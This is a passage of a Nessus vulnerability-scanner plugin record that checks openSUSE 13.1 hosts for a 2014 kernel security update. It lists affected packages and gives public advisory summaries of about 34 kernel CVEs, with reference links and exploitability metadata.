"p-cpe:/a:novell:opensuse:kernel-trace-devel-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-debugsource", "p-cpe:/a:novell:opensuse:cloop-kmp-xen", "p-cpe:/a:novell:opensuse:virtualbox-debugsource", "p-cpe:/a:novell:opensuse:ndiswrapper-debuginfo", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-default", "p-cpe:/a:novell:opensuse:kernel-xen-devel", "p-cpe:/a:novell:opensuse:xen-kmp-desktop", "p-cpe:/a:novell:opensuse:kernel-trace-base", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-xen", "p-cpe:/a:novell:opensuse:kernel-default-debuginfo", "p-cpe:/a:novell:opensuse:python-virtualbox", "p-cpe:/a:novell:opensuse:pcfclock-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:xen-kmp-pae", "p-cpe:/a:novell:opensuse:kernel-ec2-debuginfo", "p-cpe:/a:novell:opensuse:ipset-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-debuginfo", "p-cpe:/a:novell:opensuse:libipset3-debuginfo", "p-cpe:/a:novell:opensuse:vhba-kmp-desktop", "p-cpe:/a:novell:opensuse:kernel-ec2-base-debuginfo", "p-cpe:/a:novell:opensuse:xen", "p-cpe:/a:novell:opensuse:iscsitarget", "p-cpe:/a:novell:opensuse:kernel-xen-base-debuginfo", "p-cpe:/a:novell:opensuse:vhba-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:ipset-kmp-xen", "p-cpe:/a:novell:opensuse:crash-gcore-debuginfo", "p-cpe:/a:novell:opensuse:crash-eppic-debuginfo", "p-cpe:/a:novell:opensuse:cloop-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:ndiswrapper-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:hdjmod-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-pae", "p-cpe:/a:novell:opensuse:virtualbox-websrv-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-base-debuginfo", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-desktop", "p-cpe:/a:novell:opensuse:crash-debuginfo", "p-cpe:/a:novell:opensuse:ipset-kmp-desktop", "p-cpe:/a:novell:opensuse:cloop-debugsource", 
"p-cpe:/a:novell:opensuse:xen-tools-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:crash-kmp-pae", "p-cpe:/a:novell:opensuse:virtualbox-guest-x11-debuginfo", "p-cpe:/a:novell:opensuse:xen-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-base", "p-cpe:/a:novell:opensuse:pcfclock-debugsource", "p-cpe:/a:novell:opensuse:ndiswrapper-debugsource", "p-cpe:/a:novell:opensuse:pcfclock-kmp-pae", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default", "p-cpe:/a:novell:opensuse:iscsitarget-debugsource", "p-cpe:/a:novell:opensuse:kernel-xen-base", "p-cpe:/a:novell:opensuse:python-virtualbox-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default-devel", "p-cpe:/a:novell:opensuse:xen-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:kernel-devel", "p-cpe:/a:novell:opensuse:vhba-kmp-xen", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:vhba-kmp-pae", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default", "p-cpe:/a:novell:opensuse:xtables-addons", "p-cpe:/a:novell:opensuse:crash-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:kernel-ec2-debugsource", "p-cpe:/a:novell:opensuse:kernel-pae", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-desktop", "p-cpe:/a:novell:opensuse:xen-libs", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:ipset-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:vhba-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:xen-tools-domU-debuginfo", "p-cpe:/a:novell:opensuse:vhba-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:crash-debugsource", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-devel", "p-cpe:/a:novell:opensuse:ndiswrapper-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:ipset-devel", "p-cpe:/a:novell:opensuse:kernel-syms", 
"p-cpe:/a:novell:opensuse:cloop-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-base-debuginfo", "p-cpe:/a:novell:opensuse:crash-kmp-xen", "p-cpe:/a:novell:opensuse:cloop-kmp-pae", "p-cpe:/a:novell:opensuse:virtualbox-guest-tools-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-base", "p-cpe:/a:novell:opensuse:cloop-debuginfo", "p-cpe:/a:novell:opensuse:cloop-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:pcfclock-kmp-default", "p-cpe:/a:novell:opensuse:crash-devel", "p-cpe:/a:novell:opensuse:xen-libs-debuginfo", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:crash-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs-32bit", "p-cpe:/a:novell:opensuse:kernel-vanilla", "p-cpe:/a:novell:opensuse:ipset-kmp-default", "p-cpe:/a:novell:opensuse:kernel-xen", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel", "p-cpe:/a:novell:opensuse:kernel-debug-base", "p-cpe:/a:novell:opensuse:kernel-xen-debugsource", "p-cpe:/a:novell:opensuse:kernel-trace-devel", "p-cpe:/a:novell:opensuse:kernel-trace-debuginfo", "p-cpe:/a:novell:opensuse:pcfclock-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-debugsource", "p-cpe:/a:novell:opensuse:kernel-desktop-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default", "p-cpe:/a:novell:opensuse:crash-kmp-desktop", "p-cpe:/a:novell:opensuse:crash-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:kernel-ec2-devel", "p-cpe:/a:novell:opensuse:hdjmod-kmp-pae", "p-cpe:/a:novell:opensuse:xen-debugsource", "p-cpe:/a:novell:opensuse:hdjmod-kmp-desktop", "p-cpe:/a:novell:opensuse:crash-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-trace-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-devel", "p-cpe:/a:novell:opensuse:virtualbox-websrv", "p-cpe:/a:novell:opensuse:cloop-kmp-default", "p-cpe:/a:novell:opensuse:pcfclock", "p-cpe:/a:novell:opensuse:libipset3", "p-cpe:/a:novell:opensuse:crash", 
"p-cpe:/a:novell:opensuse:kernel-desktop-devel", "p-cpe:/a:novell:opensuse:kernel-xen-devel-debuginfo", "p-cpe:/a:novell:opensuse:xen-tools", "p-cpe:/a:novell:opensuse:cloop", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-default", "p-cpe:/a:novell:opensuse:pcfclock-kmp-desktop", "p-cpe:/a:novell:opensuse:virtualbox-guest-x11", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-pae", "p-cpe:/a:novell:opensuse:kernel-xen-debuginfo", "p-cpe:/a:novell:opensuse:xen-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:cloop-kmp-desktop", "p-cpe:/a:novell:opensuse:ipset-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-pae", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:ndiswrapper", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-desktop", "p-cpe:/a:novell:opensuse:vhba-kmp-default", "p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo", "p-cpe:/a:novell:opensuse:ndiswrapper-kmp-default", "p-cpe:/a:novell:opensuse:xen-tools-domU", "p-cpe:/a:novell:opensuse:kernel-desktop", "p-cpe:/a:novell:opensuse:xen-kmp-default", "p-cpe:/a:novell:opensuse:hdjmod-kmp-xen", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-pae", "p-cpe:/a:novell:opensuse:hdjmod-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug", "p-cpe:/a:novell:opensuse:xtables-addons-debuginfo", "p-cpe:/a:novell:opensuse:ipset-debugsource", "p-cpe:/a:novell:opensuse:kernel-trace-debugsource", "p-cpe:/a:novell:opensuse:iscsitarget-debuginfo", "p-cpe:/a:novell:opensuse:crash-gcore", "p-cpe:/a:novell:opensuse:xen-libs-debuginfo-32bit", "p-cpe:/a:novell:opensuse:virtualbox-debuginfo", "p-cpe:/a:novell:opensuse:ndiswrapper-kmp-desktop", "p-cpe:/a:novell:opensuse:cloop-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:pcfclock-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:xen-xend-tools", "p-cpe:/a:novell:opensuse:virtualbox-devel", 
"p-cpe:/a:novell:opensuse:xen-xend-tools-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox", "p-cpe:/a:novell:opensuse:kernel-default-base", "cpe:/o:novell:opensuse:13.1", "p-cpe:/a:novell:opensuse:ipset", "p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo", "p-cpe:/a:novell:opensuse:xtables-addons-debugsource", "p-cpe:/a:novell:opensuse:crash-kmp-default", "p-cpe:/a:novell:opensuse:kernel-desktop-debugsource", "p-cpe:/a:novell:opensuse:kernel-default-devel-debuginfo"], "id": "OPENSUSE-2014-793.NASL", "href": "https://www.tenable.com/plugins/nessus/80152", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-793.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80152);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-2891\", \"CVE-2013-2898\", \"CVE-2013-7263\", \"CVE-2014-0181\", \"CVE-2014-0206\", \"CVE-2014-1739\", \"CVE-2014-3181\", \"CVE-2014-3182\", \"CVE-2014-3184\", \"CVE-2014-3185\", \"CVE-2014-3186\", \"CVE-2014-3673\", \"CVE-2014-3687\", \"CVE-2014-3688\", \"CVE-2014-4171\", \"CVE-2014-4508\", \"CVE-2014-4608\", \"CVE-2014-4611\", \"CVE-2014-4715\", \"CVE-2014-4943\", \"CVE-2014-5077\", \"CVE-2014-5206\", \"CVE-2014-5207\", \"CVE-2014-5471\", \"CVE-2014-5472\", \"CVE-2014-6410\", \"CVE-2014-7826\", \"CVE-2014-7841\", \"CVE-2014-7975\", \"CVE-2014-8133\", \"CVE-2014-8709\", \"CVE-2014-8884\", \"CVE-2014-9090\", \"CVE-2014-9322\");\n\n script_name(english:\"openSUSE Security Update : the Linux Kernel (openSUSE-SU-2014:1677-1)\");\n script_summary(english:\"Check for the openSUSE-2014-793 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a 
security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The openSUSE 13.1 kernel was updated to fix security issues and bugs :\n\nSecurity issues fixed: CVE-2014-9322: A local privilege escalation in\nthe x86_64 32bit compatibility signal handling was fixed, which could\nbe used by local attackers to crash the machine or execute code.\n\nCVE-2014-9090: The do_double_fault function in arch/x86/kernel/traps.c\nin the Linux kernel did not properly handle faults associated with the\nStack Segment (SS) segment register, which allowed local users to\ncause a denial of service (panic) via a modify_ldt system call, as\ndemonstrated by sigreturn_32 in the linux-clock-tests test suite.\n\nCVE-2014-8133: Insufficient validation of TLS register usage could\nleak information from the kernel stack to userspace.\n\nCVE-2014-0181: The Netlink implementation in the Linux kernel through\n3.14.1 did not provide a mechanism for authorizing socket operations\nbased on the opener of a socket, which allowed local users to bypass\nintended access restrictions and modify network configurations by\nusing a Netlink socket for the (1) stdout or (2) stderr of a setuid\nprogram. 
(bsc#875051)\n\nCVE-2014-4508: arch/x86/kernel/entry_32.S in the Linux kernel on\n32-bit x86 platforms, when syscall auditing is enabled and the sep CPU\nfeature flag is set, allowed local users to cause a denial of service\n(OOPS and system crash) via an invalid syscall number, as demonstrated\nby number 1000.\n\nCVE-2014-3688: The SCTP implementation in the Linux kernel allowed\nremote attackers to cause a denial of service (memory consumption) by\ntriggering a large number of chunks in an association's output queue,\nas demonstrated by ASCONF probes, related to net/sctp/inqueue.c and\nnet/sctp/sm_statefuns.c.\n\nCVE-2014-3687: The sctp_assoc_lookup_asconf_ack function in\nnet/sctp/associola.c in the SCTP implementation in the Linux kernel\nallowed remote attackers to cause a denial of service (panic) via\nduplicate ASCONF chunks that trigger an incorrect uncork within the\nside-effect interpreter.\n\nCVE-2014-7975: The do_umount function in fs/namespace.c in the Linux\nkernel did not require the CAP_SYS_ADMIN capability for do_remount_sb\ncalls that change the root filesystem to read-only, which allowed\nlocal users to cause a denial of service (loss of writability) by\nmaking certain unshare system calls, clearing the / MNT_LOCKED flag,\nand making an MNT_FORCE umount system call.\n\nCVE-2014-8884: Stack-based buffer overflow in the\nttusbdecfe_dvbs_diseqc_send_master_cmd function in\ndrivers/media/usb/ttusb-dec/ttusbdecfe.c in the Linux kernel allowed\nlocal users to cause a denial of service (system crash) or possibly\ngain privileges via a large message length in an ioctl call.\n\nCVE-2014-3673: The SCTP implementation in the Linux kernel allowed\nremote attackers to cause a denial of service (system crash) via a\nmalformed ASCONF chunk, related to net/sctp/sm_make_chunk.c and\nnet/sctp/sm_statefuns.c.\n\nCVE-2014-3186: Buffer overflow in the picolcd_raw_event function in\ndevices/hid/hid-picolcd_core.c in the PicoLCD HID device driver in the\nLinux kernel, 
as used in Android on Nexus 7 devices, allowed\nphysically proximate attackers to cause a denial of service (system\ncrash) or possibly execute arbitrary code via a crafted device that\nsends a large report.\n\nCVE-2014-7841: The sctp_process_param function in\nnet/sctp/sm_make_chunk.c in the SCTP implementation in the Linux\nkernel, when ASCONF is used, allowed remote attackers to cause a\ndenial of service (NULL pointer dereference and system crash) via a\nmalformed INIT chunk.\n\nCVE-2014-4611: Integer overflow in the LZ4 algorithm implementation,\nas used in Yann Collet LZ4 before r118 and in the lz4_uncompress\nfunction in lib/lz4/lz4_decompress.c in the Linux kernel before\n3.15.2, on 32-bit platforms might allow context-dependent attackers to\ncause a denial of service (memory corruption) or possibly have\nunspecified other impact via a crafted Literal Run that would be\nimproperly handled by programs not complying with an API limitation, a\ndifferent vulnerability than CVE-2014-4715.\n\nCVE-2014-4608: Multiple integer overflows in the lzo1x_decompress_safe\nfunction in lib/lzo/lzo1x_decompress_safe.c in the LZO decompressor in\nthe Linux kernel allowed context-dependent attackers to cause a denial\nof service (memory corruption) via a crafted Literal Run.\n\nCVE-2014-8709: The ieee80211_fragment function in net/mac80211/tx.c in\nthe Linux kernel did not properly maintain a certain tail pointer,\nwhich allowed remote attackers to obtain sensitive cleartext\ninformation by reading packets.\n\nCVE-2014-3185: Multiple buffer overflows in the\ncommand_port_read_callback function in drivers/usb/serial/whiteheat.c\nin the Whiteheat USB Serial Driver in the Linux kernel allowed\nphysically proximate attackers to execute arbitrary code or cause a\ndenial of service (memory corruption and system crash) via a crafted\ndevice that provides a large amount of (1) EHCI or (2) XHCI data\nassociated with a bulk response.\n\nCVE-2014-3184: The report_fixup functions in the 
HID subsystem in the\nLinux kernel might have allowed physically proximate attackers to\ncause a denial of service (out-of-bounds write) via a crafted device\nthat provides a small report descriptor, related to (1)\ndrivers/hid/hid-cherry.c, (2) drivers/hid/hid-kye.c, (3)\ndrivers/hid/hid-lg.c, (4) drivers/hid/hid-monterey.c, (5)\ndrivers/hid/hid-petalynx.c, and (6) drivers/hid/hid-sunplus.c.\n\nCVE-2014-3182: Array index error in the logi_dj_raw_event function in\ndrivers/hid/hid-logitech-dj.c in the Linux kernel allowed physically\nproximate attackers to execute arbitrary code or cause a denial of\nservice (invalid kfree) via a crafted device that provides a malformed\nREPORT_TYPE_NOTIF_DEVICE_UNPAIRED value.\n\nCVE-2014-3181: Multiple stack-based buffer overflows in the\nmagicmouse_raw_event function in drivers/hid/hid-magicmouse.c in the\nMagic Mouse HID driver in the Linux kernel allowed physically\nproximate attackers to cause a denial of service (system crash) or\npossibly execute arbitrary code via a crafted device that provides a\nlarge amount of (1) EHCI or (2) XHCI data associated with an event.\n\nCVE-2014-7826: kernel/trace/trace_syscalls.c in the Linux kernel did\nnot properly handle private syscall numbers during use of the ftrace\nsubsystem, which allowed local users to gain privileges or cause a\ndenial of service (invalid pointer dereference) via a crafted\napplication.\n\nCVE-2013-7263: The Linux kernel updated certain length values before\nensuring that associated data structures have been initialized, which\nallowed local users to obtain sensitive information from kernel stack\nmemory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call,\nrelated to net/ipv4/ping.c, net/ipv4/raw.c, net/ipv4/udp.c,\nnet/ipv6/raw.c, and net/ipv6/udp.c. This update fixes the leak of the\nport number when using ipv6 sockets. 
(bsc#853040).\n\nCVE-2013-2898: Fixed potential kernel caller confusion via\npast-end-of-heap-allocation read in sensor-hub HID driver.\n\nCVE-2013-2891: Fixed 16 byte past-end-of-heap-alloc zeroing in\nsteelseries HID driver.\n\nCVE-2014-6410: The __udf_read_inode function in fs/udf/inode.c in the\nLinux kernel did not restrict the amount of ICB indirection, which\nallowed physically proximate attackers to cause a denial of service\n(infinite loop or stack consumption) via a UDF filesystem with a\ncrafted inode.\n\nCVE-2014-5471: Stack consumption vulnerability in the\nparse_rock_ridge_inode_internal function in fs/isofs/rock.c in the\nLinux kernel allowed local users to cause a denial of service\n(uncontrolled recursion, and system crash or reboot) via a crafted\niso9660 image with a CL entry referring to a directory entry that has\na CL entry.\n\nCVE-2014-5472: The parse_rock_ridge_inode_internal function in\nfs/isofs/rock.c in the Linux kernel allowed local users to cause a\ndenial of service (unkillable mount process) via a crafted iso9660\nimage with a self-referential CL entry.\n\nCVE-2014-0206: Array index error in the aio_read_events_ring function\nin fs/aio.c in the Linux kernel allowed local users to obtain\nsensitive information from kernel memory via a large head value.\n\nCVE-2014-4508: arch/x86/kernel/entry_32.S in the Linux kernel on\n32-bit x86 platforms, when syscall auditing is enabled and the sep CPU\nfeature flag is set, allowed local users to cause a denial of service\n(OOPS and system crash) via an invalid syscall number, as demonstrated\nby number 1000.\n\nCVE-2014-5206: The do_remount function in fs/namespace.c in the Linux\nkernel did not maintain the MNT_LOCK_READONLY bit across a remount of\na bind mount, which allowed local users to bypass an intended\nread-only restriction and defeat certain sandbox protection mechanisms\nvia a 'mount -o remount' command within a user namespace.\n\nCVE-2014-5207: fs/namespace.c in the Linux kernel did 
not properly\nrestrict clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing\nMNT_ATIME_MASK during a remount of a bind mount, which allowed local\nusers to gain privileges, interfere with backups and auditing on\nsystems that had atime enabled, or cause a denial of service\n(excessive filesystem updating) on systems that had atime disabled via\na 'mount -o remount' command within a user namespace.\n\nCVE-2014-1739: The media_device_enum_entities function in\ndrivers/media/media-device.c in the Linux kernel did not initialize a\ncertain data structure, which allowed local users to obtain sensitive\ninformation from kernel memory by leveraging /dev/media0 read access\nfor a MEDIA_IOC_ENUM_ENTITIES ioctl call.\n\nCVE-2014-4943: The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the\nLinux kernel allowed local users to gain privileges by leveraging\ndata-structure differences between an l2tp socket and an inet socket.\n\nCVE-2014-4508: arch/x86/kernel/entry_32.S in the Linux kernel on\n32-bit x86 platforms, when syscall auditing is enabled and the sep CPU\nfeature flag is set, allowed local users to cause a denial of service\n(OOPS and system crash) via an invalid syscall number, as demonstrated\nby number 1000.\n\nCVE-2014-5077: The sctp_assoc_update function in net/sctp/associola.c\nin the Linux kernel, when SCTP authentication is enabled, allowed\nremote attackers to cause a denial of service (NULL pointer\ndereference and OOPS) by starting to establish an association between\ntwo endpoints immediately after an exchange of INIT and INIT ACK\nchunks to establish an earlier association between these endpoints in\nthe opposite direction.\n\nCVE-2014-4171: mm/shmem.c in the Linux kernel did not properly\nimplement the interaction between range notification and hole\npunching, which allowed local users to cause a denial of service\n(i_mutex hold) by using the mmap system call to access a hole, as\ndemonstrated by interfering with intended shmem activity by 
blocking\ncompletion of (1) an MADV_REMOVE madvise call or (2) an\nFALLOC_FL_PUNCH_HOLE fallocate call.\n\nAlso the following bugs were fixed :\n\n - KEYS: Fix stale key registration at error path\n (bnc#908163).\n\n - parport: parport_pc, do not remove parent devices early\n (bnc#856659).\n\n - xfs: fix directory hash ordering bug.\n\n - xfs: mark all internal workqueues as freezable\n (bnc#899785).\n\n - [media] uvc: Fix destruction order in uvc_delete()\n (bnc#897736).\n\n - cfq-iosched: Fix wrong children_weight calculation\n (bnc#893429).\n\n - target/rd: Refactor rd_build_device_space +\n rd_release_device_space (bnc#882639).\n\n - Btrfs: Fix memory corruption by ulist_add_merge() on\n 32bit arch (bnc#887046).\n\n - usb: pci-quirks: Prevent Sony VAIO t-series from\n switching usb ports (bnc#864375).\n\n - xhci: Switch only Intel Lynx Point-LP ports to EHCI on\n shutdown (bnc#864375).\n\n - xhci: Switch Intel Lynx Point ports to EHCI on shutdown\n (bnc#864375).\n\n - ALSA: hda - Fix broken PM due to incomplete i915\n initialization (bnc#890114).\n\n - netbk: Don't destroy the netdev until the vif is shut\n down (bnc#881008).\n\n - swiotlb: don't assume PA 0 is invalid (bnc#865882).\n\n - PM / sleep: Fix request_firmware() error at resume\n (bnc#873790).\n\n - usbcore: don't log on consecutive debounce failures of\n the same port (bnc#818966).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=818966\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=835839\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=853040\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=856659\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=864375\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=865882\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=873790\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=875051\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=881008\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=882639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=882804\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=883518\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=883724\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=883948\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=883949\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=884324\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=887046\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=887082\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=889173\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=890114\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=891689\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=892490\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=893429\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=896382\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=896385\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=896390\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=896391\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=896392\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=896689\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=897736\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=899785\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=900392\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=902346\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=902349\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=902351\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=904013\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=904700\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=905100\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=905744\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=907818\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=908163\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=909077\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=910251\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-12/msg00076.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected Linux Kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-desktop-debuginfo\");\n 
